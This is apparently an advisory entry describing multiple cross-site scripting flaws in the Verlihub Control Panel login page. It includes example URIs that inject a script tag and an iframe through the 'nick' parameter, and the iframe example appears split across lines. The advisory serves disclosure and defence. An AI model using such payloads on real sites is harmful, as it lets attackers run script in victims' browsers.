• info
• discussion
• exploit
• solution
• references

Verlihub Control Panel Multiple Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>
http://www.example.com/index.php?page=login&nick="><iframe src=
http://www.example.com/index.html?news></iframe>